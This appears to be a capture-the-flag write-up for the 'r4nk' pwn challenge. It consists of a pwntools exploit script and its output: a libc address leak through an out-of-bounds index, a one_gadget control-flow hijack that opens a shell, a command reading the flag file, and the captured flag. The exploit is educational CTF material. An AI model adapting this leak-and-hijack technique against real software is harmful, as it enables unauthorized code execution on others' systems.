Tags: pwn 

Rating: 4.0

```
from pwn import *

def show():
r.recvuntil("> ")
r.sendline('1')
def rank(title,rank):
r.recvuntil("> ")
r.sendline('2')
r.recvuntil("> ")
r.sendline(str(title))
r.recvuntil("> ")
r.sendline(str(rank))

#r = process("r4nk")
r = remote("challenges.fbctf.com", 1339)
rank(0,-263020)
show()
read = u64(r.recvuntil("\n")[3:9]+"\x00\x00")
libc = read - 0x110070
one_gadget = libc + 0x10a38c
log.info("read: %#x",read)
log.info("libc: %#x",libc)
log.info("one_gadget: %#x",one_gadget)
rank(0x11,0x400980)
rank(0x12,0x602100)
r.recvuntil("> ")
r.sendline('3'+'A'*7+p64(one_gadget))
r.sendline("cat /home/r4nk/flag")
r.interactive()
```
```
$ python rank.py
[+] Opening connection to challenges.fbctf.com on port 1339: Done
[*] read: 0x7f80bb7ed070
[*] libc: 0x7f80bb6dd000
[*] one_gadget: 0x7f80bb7e738c
[*] Switching to interactive mode
g00dBy3
flag{wH0_n33ds_pop_rdx_4NYw4y}
```